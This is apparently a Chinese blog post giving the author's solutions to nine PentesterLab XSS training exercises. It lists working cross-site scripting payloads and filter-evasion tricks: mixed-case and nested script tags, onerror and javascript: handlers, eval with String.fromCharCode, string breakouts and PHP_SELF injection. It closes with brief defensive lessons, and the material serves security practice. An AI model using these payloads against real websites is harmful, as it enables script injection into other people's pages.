XSS 练习

from my wp blog

一个不错的网站，不错的渗透教程

虽然是很基础的东西，但是涵盖了好多知识

9道XSS练习题

解题过程

url参数直接写进html里面

?name=<script>alert(1)</script>
若果过滤<script></script>
不妨<sCript></sCript>

全过滤则是Pentest<script>erLab显示PentesterLab
则是<scrip<script>t>alert(1)</scrip</script>t>

若果怎样的<script>都不管用了，制造一堆事件
<a href=’javascript:alert(1)’
<img src=’zzzz’ onerror=’alert(1)’ />.
onmouseout, onmousemove….

alter被过滤
用 eval 和 String.fromCharCode()
把ascii数字转成字符再执行，可以获得alert(1)
prompt 和 confirm也是弹窗

若果?name=的值是写入<script></script>里面的，比如var s=””
那就在?name=“;alert(1);”，把东西写到双引号直接，注意每句结尾的分号

hp会把输出的内容html编码，htmlentities，<，>,，但是单引号’不在内

有些post提交表单是使用PHP_SELF，那么action的值就是url
这样修改url，../example8.php/><script>alert(0)</script><好了

面对静态文件，不要慌，看看里面的js怎么写的
js对url进行操作，写进html里，那就改url
把<script>嵌进里面</script>

小结

• 不能把url的东西往html里面写
• 表单的提交数据和各种url需要过滤